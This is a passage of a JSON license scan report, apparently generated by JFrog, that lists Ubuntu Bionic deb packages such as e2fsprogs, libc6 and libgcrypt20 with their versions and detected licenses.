"occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:e2fsprogs:1.44.1-1ubuntu1.4", - "component_name": "ubuntu:bionic:e2fsprogs", - "version": "1.44.1-1ubuntu1.4", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:e2fsprogs", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:fdisk:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:fdisk", - "version": "2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:fdisk", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:findutils:4.6.0+git+20170828-2", - "component_name": "ubuntu:bionic:findutils", - "version": "4.6.0+git+20170828-2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:findutils", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:gcc-8-base:8.4.0-1ubuntu1~18.04", - "component_name": "ubuntu:bionic:gcc-8-base", - "version": "8.4.0-1ubuntu1~18.04", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:gcc-8-base", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ZLIB", - "link": "http://www.opensource.org/licenses/Zlib", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:gpgv:2.2.4-1ubuntu1.6", - "component_name": "ubuntu:bionic:gpgv", - "version": "2.2.4-1ubuntu1.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:gpgv", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0-or-later", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:grep:3.1-2build1", - "component_name": "ubuntu:bionic:grep", - "version": "3.1-2build1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:grep", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:gzip:1.6-5ubuntu1.2", - "component_name": "ubuntu:bionic:gzip", - "version": "1.6-5ubuntu1.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:gzip", - "licenses": [ - { - "key": "GPL-1.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:hostname:3.20", - "component_name": "ubuntu:bionic:hostname", - "version": "3.20", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:hostname", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:init-system-helpers:1.51", - "component_name": "ubuntu:bionic:init-system-helpers", - "version": "1.51", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:init-system-helpers", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libacl1:2.2.52-3build1", - "component_name": "ubuntu:bionic:libacl1", - "version": "2.2.52-3build1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libacl1", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libapt-pkg5.0:1.6.17", - "component_name": "ubuntu:bionic:libapt-pkg5.0", - "version": "1.6.17", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libapt-pkg5.0", - "licenses": [ - { - "key": "GPL-2.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libattr1:1:2.4.47-2build1", - "component_name": "ubuntu:bionic:libattr1", - "version": "1:2.4.47-2build1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libattr1", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libaudit-common:1:2.8.2-1ubuntu1.1", - "component_name": "ubuntu:bionic:libaudit-common", - "version": "1:2.8.2-1ubuntu1.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libaudit-common", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libaudit1:1:2.8.2-1ubuntu1.1", - "component_name": "ubuntu:bionic:libaudit1", - "version": "1:2.8.2-1ubuntu1.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libaudit1", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libblkid1:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:libblkid1", - "version": "2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libblkid1", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libbz2-1.0:1.0.6-8.1ubuntu0.2", - "component_name": "ubuntu:bionic:libbz2-1.0", - "version": "1.0.6-8.1ubuntu0.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libbz2-1.0", - "licenses": [ - { - "key": "bzip2-1.0.6", - "link": "https://github.com/asimonov-im/bzip2/blob/master/LICENSE", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libc-bin:2.27-3ubuntu1.6", - "component_name": "ubuntu:bionic:libc-bin", - "version": "2.27-3ubuntu1.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libc-bin", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause-UC", - "link": "http://www.freebsd.org/copyright/license.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "IETF", - "link": "", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Intel", - "link": "http://opensource.org/licenses/Intel", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ISC", - "link": "http://www.opensource.org/licenses/ISC", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT-CMU", - "link": "https://fedoraproject.org/wiki/Licensing:MIT?rd=Licensing/MIT#CMU_Style", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Spencer-94", - "link": "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libc6:2.27-3ubuntu1.6", - "component_name": "ubuntu:bionic:libc6", - "version": "2.27-3ubuntu1.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libc6", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause-UC", - "link": "http://www.freebsd.org/copyright/license.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "IETF", - "link": "", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Intel", - "link": "http://opensource.org/licenses/Intel", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ISC", - "link": "http://www.opensource.org/licenses/ISC", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT-CMU", - "link": "https://fedoraproject.org/wiki/Licensing:MIT?rd=Licensing/MIT#CMU_Style", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Spencer-94", - "link": "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libcap-ng0:0.7.7-3.1", - "component_name": "ubuntu:bionic:libcap-ng0", - "version": "0.7.7-3.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libcap-ng0", - "licenses": [ - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libcom-err2:1.44.1-1ubuntu1.4", - "component_name": "ubuntu:bionic:libcom-err2", - "version": "1.44.1-1ubuntu1.4", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libcom-err2", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libdb5.3:5.3.28-13.1ubuntu1.1", - "component_name": "ubuntu:bionic:libdb5.3", - "version": "5.3.28-13.1ubuntu1.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libdb5.3", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Sleepycat", - "link": "http://www.opensource.org/licenses/Sleepycat", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libdebconfclient0:0.213ubuntu1", - "component_name": "ubuntu:bionic:libdebconfclient0", - "version": "0.213ubuntu1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libdebconfclient0", - "licenses": [ - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libexpat1:2.2.5-3ubuntu0.9", - "component_name": "ubuntu:bionic:libexpat1", - "version": "2.2.5-3ubuntu0.9", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libexpat1", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libext2fs2:1.44.1-1ubuntu1.4", - "component_name": "ubuntu:bionic:libext2fs2", - "version": "1.44.1-1ubuntu1.4", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libext2fs2", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libfdisk1:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:libfdisk1", - "version": "2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libfdisk1", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libffi6:3.2.1-8", - "component_name": "ubuntu:bionic:libffi6", - "version": "3.2.1-8", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libffi6", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libgcc1:1:8.4.0-1ubuntu1~18.04", - "component_name": "ubuntu:bionic:libgcc1", - "version": "1:8.4.0-1ubuntu1~18.04", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libgcc1", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ZLIB", - "link": "http://www.opensource.org/licenses/Zlib", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libgcrypt20:1.8.1-4ubuntu1.3", - "component_name": "ubuntu:bionic:libgcrypt20", - "version": "1.8.1-4ubuntu1.3", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libgcrypt20", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "X11", - "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libgmp10:2:6.1.2+dfsg-2ubuntu0.1", - "component_name": "ubuntu:bionic:libgmp10", - "version": "2:6.1.2+dfsg-2ubuntu0.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libgmp10", - "licenses": [ - { - "key": "GPL-2.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libgnutls30:3.5.18-1ubuntu1.6", - "component_name": "ubuntu:bionic:libgnutls30", - "version": "3.5.18-1ubuntu1.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libgnutls30", - "licenses": [ - { - "key": "BSD-2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "CC0-1.0", - "link": "http://creativecommons.org/publicdomain/zero/1.0/", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GFDL-1.3-no-invariants-or-later", - "link": "", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ISC", - "link": "http://www.opensource.org/licenses/ISC", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0-only", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Mup", - "link": "https://fedoraproject.org/wiki/Licensing/Mup", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libgpg-error0:1.27-6", - "component_name": "ubuntu:bionic:libgpg-error0", - "version": "1.27-6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libgpg-error0", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libhogweed4:3.4.1-0ubuntu0.18.04.1", - "component_name": "ubuntu:bionic:libhogweed4", - "version": "3.4.1-0ubuntu0.18.04.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libhogweed4", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libidn2-0:2.0.4-1.1ubuntu0.2", - "component_name": "ubuntu:bionic:libidn2-0", - "version": "2.0.4-1.1ubuntu0.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libidn2-0", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:liblz4-1:0.0~r131-2ubuntu3.1", - "component_name": "ubuntu:bionic:liblz4-1", - "version": "0.0~r131-2ubuntu3.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:liblz4-1", - "licenses": [ - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:liblzma5:5.2.2-1.3ubuntu0.1", - "component_name": "ubuntu:bionic:liblzma5", - "version": "5.2.2-1.3ubuntu0.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:liblzma5", - "licenses": [ - { - "key": "GPL-2.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libmount1:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:libmount1", - "version": "2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libmount1", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libncurses5:6.1-1ubuntu1.18.04.1", - "component_name": "ubuntu:bionic:libncurses5", - "version": "6.1-1ubuntu1.18.04.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libncurses5", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "X11", - "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libncursesw5:6.1-1ubuntu1.18.04.1", - "component_name": "ubuntu:bionic:libncursesw5", - "version": "6.1-1ubuntu1.18.04.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libncursesw5", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "X11", - "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libnettle6:3.4.1-0ubuntu0.18.04.1", - "component_name": "ubuntu:bionic:libnettle6", - "version": "3.4.1-0ubuntu0.18.04.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libnettle6", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - 